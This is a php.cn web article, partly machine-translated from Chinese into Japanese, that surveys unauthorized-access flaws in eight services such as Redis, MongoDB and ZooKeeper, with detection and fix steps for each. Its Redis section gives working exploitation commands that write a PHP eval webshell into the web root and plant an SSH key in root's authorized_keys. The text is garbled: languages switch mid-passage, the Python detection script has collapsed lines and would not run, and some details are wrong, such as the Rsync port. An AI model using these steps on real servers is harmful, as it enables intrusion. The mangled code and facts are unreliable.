ホームページ > 運用・保守 > 安全性 > 一般的な不正アクセスの脆弱性の概要

一般的な不正アクセスの脆弱性の概要

王林
リリース: 2019-12-02 17:40:44
オリジナル
5019 人が閲覧しました

一般的な不正アクセスの脆弱性の概要

不正アクセスの脆弱性は、セキュリティ設定や権限認証を必要とするアドレスや認証ページの欠陥として理解され、他のユーザーがデータベースや Web サイトに直接アクセスして重要な権限が操作されることを可能にします。機密情報が漏洩するまで待ちます。

一般的な不正アクセスの脆弱性

1.MongoDB の不正アクセスの脆弱性

2.Redis の不正アクセスの脆弱性

3.Memcached の不正アクセスの脆弱性 CVE-2013-7239

4.JBOSS 不正アクセスの脆弱性

5.VNC 不正アクセスの脆弱性

6.Docker 不正アクセスの脆弱性

7 .ZooKeeper 不正アクセスの脆弱性

8.Rsync 不正アクセスの脆弱性

1.MongoDB 不正アクセスの脆弱性

##脆弱性情報

( 1) 脆弱性の概要 MongoDB サービスを開くときにパラメーターを追加しない場合、デフォルトでは権限の検証は行われません。データベースにリモートでアクセスしてログインできるユーザーは、パスワードなしでデフォルトのポート 27017 を介してデータベースにアクセスできます。高- 追加、削除、変更、確認などの危険な操作。最初にインストールしたとき、MongoDB にはデフォルトで管理データベースが存在しますが、この時点では管理データベースは空であり、権限関連の情報は記録されていません。 admin.system.users にユーザーが存在しない場合、MongoDB が -auth パラメーターを使用して起動された場合でも、ユーザーが admin.system に追加されるまでは、-auth パラメーターを使用して起動したかどうかに関係なく、任意の操作を実行できます。ユーザー。

(2) リスクレベルは高リスクです。

(3) 脆弱性番号 なし。

(4) 影響を受ける範囲: MongoDB データベース。

検出方法

対応するスクリプトを自分でコンパイルするか、特別なツールを使用して検出できます。設定ファイルを確認することもできます

(1 ) 127.0.0.1

--bind_ip 127.0.0.1
or
vim /etc/mongodb.conf
bind_ip = 127.0.0.1
ログイン後にコピー

(2) 認証が有効になっているか確認

mongod --auth
or
vim /etc/mongodb.conf
auth = true
ログイン後にコピー

修復方法

#(1) MongoDB の認証を追加する


① MongoDB の起動時に -auth パラメータを追加します。

② MongoDB へのユーザーの追加

use admin # 使用 admin 库
db.addUser“用户名” “密码”# 添加用户名、密码
db.auth“用户名”,“密码”# 验证是否添加成功返回 1 说明成功。
ログイン後にコピー

(2) HTTP ポートと REST ポートを無効にする

MongoDB 自体は HTTP サービスを備えており、REST インターフェイスをサポートしています。これらのインターフェイスは、バージョン 2.6 以降、デフォルトで閉じられます。 MongoDB は、デフォルトで Web サービスをリッスンするためにデフォルトのポートを使用します。通常、Web 経由でリモート管理を実行する必要はありません。無効にすることをお勧めします。構成ファイルを変更するか、起動時に -nohttpinterface パラメーター nohttpinterface = false を選択します。

(3) バインド IP を制限する

--bind_ip 127.0.0.1
ログイン後にコピー

起動時にパラメータを追加するか、/etc/mongodb.conf ファイルに次の内容を追加します

bind_ip = 127.0.0.1
ログイン後にコピー

2. Redis の不正アクセスの脆弱性

脆弱性情報(1) 脆弱性の概要 Redis は、高性能の Key-Value データベースです。 Redis の登場により、memcached などのキー/値ストレージの欠点が大幅に補われ、状況によってはリレーショナル データベースで優れた補完的な役割を果たすことができます。 Redis はデフォルトで 0.0.0.0:6379 にバインドされ、これにより Redis サービスがパブリック ネットワークに公開されます。認証を有効にしないと、ターゲット サーバーにアクセスできるユーザーであれば、承認なしで Redis にアクセスし、Redis データを読み取ることができます。 Redis へのアクセスが許可されていない場合、攻撃者は Redis 関連のメソッドを使用して Redis サーバーに公開キーを正常に書き込み、対応する秘密キーを使用してターゲット サーバーに直接ログインする可能性があります。

(2) リスクレベルは高リスクです。

(3) 脆弱性番号 なし。

(4) 影響範囲 Redis データベース。

検出方法

先用 nmap 扫描查看端口开放情况发现开放的 6379 端口为 Redis 的默认端口

Nmap -A -p 6379 --script redis-info 192.168.10.153
ログイン後にコピー

Nmap 扫描后发现主机的 6379 端口对外开放可以通过 Redis 客户端进行连接测试是否存在未授权访问漏洞具体命令如下:

./redis-cli -h 192.168.10.153
Info
ログイン後にコピー

就可以看到 Redis 的版本和服务器上内核的版本信息也可以 del key 删除数据在网站写入木马写入 SSH 公钥或者在 crontab 里写定时任务反弹 shell 等。

(1) 网站写码

① 先用客户端连接服务器的 redis 服务

redis-cli.exe -h 目标IP
ログイン後にコピー

② 连接后设置目录

config set dir /var/www/html此路径是服务器端 Web 网站的目录
ログイン後にコピー

③ 设置要写入的文件名

config set dbfilename redis88.php
ログイン後にコピー

④ 设置要写入的内容

set webshell "<?php @eval($_POST[&#39;123&#39;]); ?>"
ログイン後にコピー

⑤ 保存

save
ログイン後にコピー

⑥ 保存后用菜刀连接此木马得到 webshell。

(2) 结合 SSH 免密码登录

① 先在本地建个 ssh 的密钥

ssh-keygen-trsa
ログイン後にコピー

② 将公钥的内容写到一个文本中命令如下

(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > test.txt
ログイン後にコピー

注意写到文件中时一定要在前面加几行后面加几行。

③ 将里面的内容写入远程的 Redis 服务器上并且设置其 Key 为 test命令如下

cat test.txt | redis -cli -h <hostname> -x set test
ログイン後にコピー

④ 登录远程服务器可以看到公钥已经添加到 Redis 的服务器上了命令如下

redis-cli -h <hostname>
keys *get test
ログイン後にコピー

⑤ 随后就是最关键的了Redis 有个 save 命令save 命令执行一个同步保存操作将当前 Redis 实例的所有数据快照snapshot以 RDB 文件的形式保存到硬盘。所以save 命令就可以将 test 里的公钥保存到 /root/.ssh 下要有权限。

修改保存的路径为

config set dir "/root/.ssh"
ログイン後にコピー

修改文件名为

config set dbfilename "authorized_keys"
ログイン後にコピー

保存。

⑥ 测试一下

ssh 用户名@<IP地址>
ログイン後にコピー

实现免密码成功登陆。

修复方法

(1) 设置 Redis 访问密码在 redis.conf 中找到 “requirepass” 字段在后面填上强口令redis 客户端也需要此密码来访问 redis 服务。

(2) 配置 bind 选项限定可以连接 Reids 服务器的 IP并修改默认端口 6379。

(3) 重启 Redis 服务。

(4) 清理系统中存在的后门木马。

三、Memcached 未授权访问漏洞CVE-2013-7239

漏洞信息

(1) 漏洞简述Memcached 是一套分布式高速缓存系统。它以 Key – Value 的形式将数据存储在内存中。这些数据通常是会被频繁地应用、读取的。正因为内存中数据的读取速度远远大于硬盘的读取速度所以可以用来加速应用的访问。由于 Memcached 的安全设计缺陷客户端连接 Memcached 服务器后无需认证就可读取、修改服务器缓存内容。

(2) 风险等级高风险。

(3) 漏洞编号CVE-2013-7239 。

(4) 影响范围Memcached 全版本。

检测方法

登录机器执行 netstat -an | more 命令查看端口监听情况。回显 0.0.0.0:1121111211 表示在所有网卡进行监听存在 Memcached 未授权访问漏洞。

telnet <target> 11211
or
nc -vv <target> 11211
ログイン後にコピー

提示连接成功表示漏洞存在。

使用端口扫描工具 nmap 进行远程扫描

nmap -sV -p11211 --script memcached-info <target>
ログイン後にコピー

修复方法

(1) 配置访问控制。建议用户不要将服务发布到互联网上以防被黑客利用而可以通过安全组规则或 Iptables 配置访问控制规则只允许内部必需的用户地址访问命令如下

iptables -A INPUT -p tcp -s 192.168.0.2 --dport 11211 -j ACCEPT
ログイン後にコピー

(2) bind 指定监听 IP。如果 Memcached 没有在外网开放的必要可在 Memcached 启动时指定绑定的 IP 地址为 127.0.0.1。例如

memcached -d -m 1024 -u memcached -l 127.0.0.1 -p 11211 -c 1024 -P /tmp/memcached.pid
ログイン後にコピー
ログイン後にコピー

(3) 最小化权限运行。使用普通权限账号运行以下指定 memcached 用户运行

memcached -d -m 1024 -u memcached -l 127.0.0.1 -p 11211 -c 1024 -P /tmp/memcached.pid
ログイン後にコピー
ログイン後にコピー

(4) 修改默认端口。修改默认 11211 监听端口为 11222 端口

memcached -d -m 1024 -u memcached -l 127.0.0.1 -p 11222 -c 1024 -P /tmp/memcached.pid
ログイン後にコピー

(5) 备份数据。为避免数据丢失升级前应做好备份或建立硬盘快照。

四、JBOSS 未授权访问漏洞

漏洞信息

(1) 漏洞简述JBOSS 企业应用平台EAP是 J2EE 应用的中间件平台。默认情况下访问 http://ip:8080/jmx-console 就可以浏览 jboss 的部署管理的信息不需要输入用户名和密码可以直接部署上传木马有安全隐患。

(2) 风险等级高风险。

(3) 漏洞编号无。

(4) 影响范围JBOSS 全版本。

检测方法

先用 nmap 扫描查看端口开放情况看是否开放 JBOSS 端口。再使用漏洞测试工具测试 jmx 组件存在情况通过访问 http://ip:jboss端口/ 看是否能进入 jmx-console 和 web-console 。

修复方法

JMX Console 安全配置

① 找到 %JBOSS_HOME%/server/default/deploy/jmx-console.war/WEB-INF/jboss-web.xml 文件去掉下面这段 xml 文本的注释。

② 与 jboss-web.xml 同级的目录下还有一个文件 web.xml找到下面这段 xml 文本把 GET 和 POST 两行注释掉同时 security-constraint 整个部分取消注释, 不然存在head头绕过。

③ %JBOSS_HOME%\server\default\conf\props\jbossws-users.properties 中删除原始的 admin/admin添加新的用户名密码。

④ %JBOSS_HOME%\server\default\conf\props\jbossws-roles.properties 中定义新用户名所属角色。该文件定义的格式为用户名 = 角色多个角色以 “,” 隔开该文件默认为 admin 用户定义了 JBossAdmin 和 HttpInvoker 这两个角色。

# A sample roles.properties file foruse with the UsersRolesLoginModule
kermit = JBossAdmin,HttpInvoker
ログイン後にコピー

五、VNC 未授权访问漏洞

漏洞信息

(1) 漏洞简述VNC 是虚拟网络控制台Virtual Network Console的英文缩写。它是一款优秀的远程控制工具软件由美国电话电报公司AT&T的欧洲研究实验室开发。VNC是基于 UNXI 和 Linux 的免费开源软件由 VNC Server 和 VNC Viewer 两部分组成。VNC 默认端口号为 5900、5901。VNC 未授权访问漏洞如被利用可能造成恶意用户直接控制受控主机危害相当严重。

(2) 风险等级高风险。

(3) 漏洞编号无。

(4) 影响范围VNC 全版本。

检测方法

使用 metasploit 进行批量检测

(1) 在 kali 下运行 msfconsolemsfconsole。

(2) 调用 VNC 未授权检测模块use auxiliary/scanner/vnc/vnx_none_auth。

(3) 显示有哪些选项show options。

(4) 设置地址段set rhosts ip 或 段。

(5) 设置线程set threads 50。

(6) 开始扫描run。

修复方法

(1) 配置 VNC 客户端登录口令认证并配置符合密码强度要求的密码。

(2) 以最小权限的普通用户身份运行操作系统。

六、Docker 未授权访问漏洞

漏洞信息

(1) 漏洞简述Docker 是一个开源的引擎可以轻松地为任何应用创建一个轻量级的、可移植的、自给自足的容器。开发者在笔记本上编译测试通过的容器可以批量地在生产环境中部署包括 VMs、bare metal、OpenStack 集群和其他的基础应用平台Docker 存在问题的版本分别为 1.3 和 1.6因为权限控制等问题导致可以脱离容器拿到宿主机权限。

(2) 风险等级高风险。

(3) 漏洞编号无。

(4) 影响范围Docker 1.3、Docker 1.6。

检测方法

先用 nmap 扫描查看端口开放情况。2375 为 docker 端口如果存在漏洞会有以下情况url 输入 ip:2375/version 就会列出基本信息也可以执行目标服务器容器命令如 container、image 等。

修复方法

(1) 使用 TLS 认证。

(2) 网络访问控制Network Access Control

七、ZooKeeper 未授权访问漏洞

漏洞信息

(1) 漏洞简述ZooKeeper 是一个分布式的开放源码的分布式应用程序协调服务是 Google 的 Chubby 一个开源的实现是 Hadoop 和 Hbase 的重要组件。它是一个为分布式应用提供一致性服务的软件提供的功能包括配置维护、域名服务、分布式同步、组服务等。ZooKeeper 默认开启在 2181 端口在未进行任何访问控制的情况下攻击者可通过执行 envi 命令获得系统大量的敏感信息包括系统名称Java 环境。这将导致任意用户在网络可达的情况下进行为未授权访问并读取数据甚至 kill 服务。

(2) 风险等级高风险。

(3) 漏洞编号无。

(4) 影响范围Zookeeper 全版本。

检测方法

(1) 通过 nmap 扫描开放了 2181 端口的主机。

(2) 运行脚本通过 socket 连接 2181 端口并发送 envi 命令若服务端返回的数据中包含 ZooKeeper 的服务运行环境信息即可证明存在未授权访问。

检测脚本

# coding=utf-8
 import socketimport sys 
def check(ip, port, timeout, cmd):
    try:
        socket.setdefaulttimeout(timeout)
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((ip, int(port)))
        s.send(cmd)
        data = s.recv(1024)
        s.close()        print data    except:        passdef main():
    if len(sys.argv) < 3:
        exit()
    ip = sys.argv[1]
    cmd = sys.argv[2]    # envi
    # dump
    # reqs
    # ruok
    # stat
    check(ip, 2181, 3, cmd) 
if __name__ == &#39;__main__&#39;:
    main()
ログイン後にコピー

修复方法 

(1) ZooKeeper のデフォルト ポートを変更し、他のポート サービスを使用し、サービス送信元アドレス制限ポリシーを構成します。

(2) ZooKeeper 認証構成を追加します。

8. Rsync 不正アクセスの脆弱性

脆弱性情報

(1) 脆弱性の簡単な説明: Rsync (リモート同期) は、LAN/WAN を介して複数のホスト間でファイルを迅速に同期でき、ローカル ハードディスク内の異なるディレクトリも同期できるリモート データ同期ツールです。 Rsync はデフォルトで匿名アクセスを許可しますが、設定ファイルに関連するユーザー認証とファイル認可が存在しない場合、隠れた危険が引き起こされます。 Rsync のデフォルトのポートは 837 です。

(2) リスク レベル: 高リスク。

(3) 脆弱性番号: なし。

(4) 影響範囲: Rsync のすべてのバージョン。

検出方法

nmap scan: nmap ip -p837。

現在のディレクトリを一覧表示し、ユーザー: rsync ip を表示します。

root の場合は、任意のファイルをダウンロードしたり、ファイルをアップロードしたりできます。

修復方法

(1) モジュール情報を非表示にする: 設定ファイルリスト =false を変更します。

(2) 権限制御: 書き込み権限を必要としないモジュールは読み取り専用に設定されます。読み取り専用 = true。

(3) ネットワーク アクセス制御: セキュリティ グループ ポリシーまたはホワイトリスト制限を使用して、必要なホストのみにアクセスを許可します: ホスト許可 = 123.123.123.123。

(4) アカウント認証: 指定されたユーザーのみが、指定されたパスワードで rsync サービスを使用できます。

(5) データの暗号化された送信: Rsync はデフォルトでは暗号化された送信を直接サポートしていません。非常に重要なデータを同期するために Rsync が必要な場合は、ssh を使用できます。

おすすめの関連記事とチュートリアル: Web セキュリティ チュートリアル

以上が一般的な不正アクセスの脆弱性の概要の詳細内容です。詳細については、PHP 中国語 Web サイトの他の関連記事を参照してください。

関連ラベル:
ソース:php.cn
このウェブサイトの声明
この記事の内容はネチズンが自主的に寄稿したものであり、著作権は原著者に帰属します。このサイトは、それに相当する法的責任を負いません。盗作または侵害の疑いのあるコンテンツを見つけた場合は、admin@php.cn までご連絡ください。
最新の問題
人気のチュートリアル
詳細>
最新のダウンロード
詳細>
ウェブエフェクト
公式サイト
サイト素材
フロントエンドテンプレート